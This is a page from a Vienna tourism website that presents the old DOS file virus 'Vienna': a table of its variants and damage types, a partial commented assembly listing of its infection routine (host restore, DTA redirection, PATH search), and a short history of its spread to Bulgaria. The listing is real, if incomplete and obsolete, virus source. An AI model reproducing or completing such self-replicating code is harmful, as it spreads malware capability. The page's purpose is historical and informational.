Vienna! See! See!     [www.vienna.cc]   [English / Deutsch / Po-Russky]   [Search/Suchen]

www.vienna.cc - Company Logo

Cooles Detail zu Wien: Der Computervirus Vienna - Dokumentation, Source(teilw.), Geschichte, Schaden - Lesen Sie hier!

Hotel ONLINE
English / Italiano / Deutsch
Español / Français
日本語 / 中文
Home ] <-- Retour ] [ Cooles Detail zu Wien: Der Computervirus Vienna - Dokumentation, Source(teilw.), Geschichte, Schaden - Lesen Sie hier! ] Sonnenfinsternis - Schauspiel der Natur in Wien ]
Online Travel Agency - Click here

ViennaCC-Music online
 

Google


Deutsch
Suchen in:

Suchbegriffe:

AMAZON.DE
Unsere Empfehlungen

English

Search:

Keywords:

AMAZON.COM
Our Recommendations
Shopping:
Deutsch
English
Po-Russky

Here is a short description of what the VIENNA-virus does:

A Infects Fixed Disk Partition Table-A-------------------+
9 Infects Fixed Disk Boot Sector-----9-----------------+ |
8 Infects Floppy Diskette Boot-------8---------------+ | |
7 Infects Overlay Files--------------7-------------+ | | |
6 Infects EXE Files------------------6-----------+ | | | |
5 Infects COM files------------------5---------+ | | | | |
4 Infects COMMAND.COM----------------4-------+ | | | | | |
3 Virus Installs Self in Memory------3-----+ | | | | | | |
2 Virus Uses Self-Encryption---------2---+ | | | | | | | |
1 Virus Uses STEALTH Techniques------1-+ | | | | | | | | |
                                       | | | | | | | | | | Increase in
                                       | | | | | | | | | |  Infected
                                       | | | | | | | | | |  Program's
                                       | | | | | | | | | |    Size
                                       1 2 3 4 5 6 7 8 9 A      |
                                       | | | | | | | | | |      |
Virus                                  V V V V V V V V V V      V     Damage
-----------------------------------------------------------------------------
1014 [Vienna]                          . . x x x . . . . .    1014    O P L
Christmas Violator[Vienna]             . . . x x . . . . .    5302    O P D
Violator (5) [Vienna]                  . . . x x . . . . .    1055    O P D

LEGEND:
Size Increase: The length in bytes by which a file will increase when infect
Damage Fields:
D - Corrupts data files
L - Directly or indirectly corrupts file linkage
O - Affects system run-time operation
P - Corrupts program or overlay files
Characteristics:
x - Yes  . - No

The Vienna-Virus Source-code:

;******************************************************************************
MOV_CX  MACRO   X
        DB      0B9H
        DW      X
ENDM
CODE    SEGMENT
        ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
        ORG     $+0100H
;*****************************************************************************
;Start out with a JMP around the remains of the original .COM file, into the
;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS.
;The rest of the file (first 3 bytes) are stored in the virus data area.
;*****************************************************************************
VCODE:  JMP     virus
;This was the rest of the original .COM file. Tiny and simple, this time
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
;************************************************************
;              The actual virus starts here
;************************************************************
v_start equ     $
virus:  PUSH    CX
        MOV     DX,OFFSET vir_dat       ;This is where the virus data starts.
                                        ; The 2nd and 3rd bytes get modified.
        CLD                             ;Pointers will be auto INcremented
        MOV     SI,DX                   ;Access data as offset from SI
        ADD     SI,first_3              ;Point to original 1st 3 bytes of .COM
        MOV     DI,OFFSET 100H          ;`cause all .COM files start at 100H
        MOV     CX,3
        REPZ    MOVSB                   ;Restore original first 3 bytes of .COM
        MOV     SI,DX                   ;Keep SI pointing to the data area
;*************************************************************
;                   Check the DOS version
;*************************************************************
        MOV     AH,30H
        INT     21H
        CMP     AL,0                    ;0 means it's version 1.X
        JNZ     dos_ok                  ;For version 2.0 or greater
        JMP     quit                    ;Don't try to infect version 1.X
;*************************************************************
;  Here if the DOS version is high enough for this to work
;*************************************************************
dos_ok: PUSH    ES
;*************************************************************
;               Get DTA address into ES:BX
;*************************************************************
        MOV     AH,2FH
        INT     21H
;*************************************************************
;                    Save the DTA address
;*************************************************************
        MOV     [SI+old_dta],BX
        MOV     [SI+old_dts],ES         ;Save the DTA address
        POP     ES
;*************************************************************
;        Set DTA to point inside the virus data area
;*************************************************************
        MOV     DX,dta                  ;Offset of new DTA in virus data area
;       NOP                             ;MASM will add this NOP here
        ADD     DX,SI                   ;Compute DTA address
        MOV     AH,1AH
        INT     21H                     ;Set new DTA to inside our own code
        PUSH    ES
        PUSH    SI
        MOV     ES,DS:2CH
        MOV     DI,0                    ;ES:DI points to environment
;************************************************************
;        Find the "PATH=" string in the environment
;************************************************************
find_path:
        POP     SI
        PUSH    SI                      ;Get SI back
        ADD     SI,env_str              ;Point to "PATH=" string in data area
        LODSB
        MOV     CX,OFFSET 8000H         ;Environment can be 32768 bytes long
        REPNZ   SCASB                   ;Search for first character
        MOV     CX,4
;************************************************************
;       Loop to check for the next four characters
;************************************************************
check_next_4:
        LODSB
        SCASB
        JNZ     find_path               ;If not all there, abort & start over
        LOOP    check_next_4            ;Loop to check the next character
        POP     SI
        POP     ES
        MOV     [SI+path_ad],DI         ;Save the address of the PATH
        MOV     DI,SI
        ADD     DI,wrk_spc              ;File name workspace
        MOV     BX,SI                   ;Save a copy of SI
        ADD     SI,wrk_spc              ;Point SI to workspace
        MOV     DI,SI                   ;Point DI to workspace
        JMP     SHORT   slash_ok
;**********************************************************
;     Look in the PATH for more subdirectories, if any
;**********************************************************
set_subdir:
        CMP     WORD PTR [SI+path_ad],0 ;Is PATH string ended?
        JNZ     found_subdir            ;If not, there are more subdirectories
        JMP     all_done                ;Else, we're all done
;**********************************************************
;    Here if there are more subdirectories in the path
;**********************************************************
found_subdir:
        PUSH    DS
        PUSH    SI
        MOV     DS,ES:2CH               ;DS points to environment segment
        MOV     DI,SI
        MOV     SI,ES:[DI+path_ad]      ;SI = PATH address
        ADD     DI,wrk_spc              ;DI points to file name workspace
;***********************************************************
;      Move subdirectory name into file name workspace
;***********************************************************
move_subdir:
        LODSB                           ;Get character
        CMP     AL,';'                  ;Is it a ';' delimiter?
        JZ      moved_one               ;Yes, found another subdirectory
        CMP     AL,0                    ;End of PATH string?
        JZ      moved_last_one          ;Yes
        STOSB                           ;Save PATH marker into [DI]
        JMP     SHORT   move_subdir
;******************************************************************
; Mark the fact that we're looking through the final subdirectory
;******************************************************************
moved_last_one:
        MOV     SI,0

... and so on ...
PLEASE DON'T MAIL ME FOR THE SOURCE-CODE, because

  1. this virus is known by nearly all virus-checkers
  2. I don't give away the sourcecode

The source of the virus Vienna was published in Russia.

How the story began
Just three years ago there were no computer viruses in Bulgaria. After all, these were things that can happen only in the capitalist countries. They were first mentioned in the April issue of the Bulgarian computer magazine "Komputar za vas" ("Computer for you") [KV88] in a paper, translated from the German magazine "Chip" [Chip]. Soon after that, the same Bulgarian magazine published an article [KV89]], explaining why computer viruses cannot be dangerous. The arguments presented were, in general, correct, but the author had completely missed the fact that the majority of PC users are not experienced programmers. A few months later, in the fall of the same year, two men came in the editor's office of the magazine and claimed that they have found a computer virus. Careful examination showed that it was the VIENNA virus...


flagat.gif (166 bytes) Startseite - Wien - Fotos - Musik - Reisetipps - Tours - Donaufahrt - Kaffeehaus - Heuriger/Wein - Links - Suchen - Impressum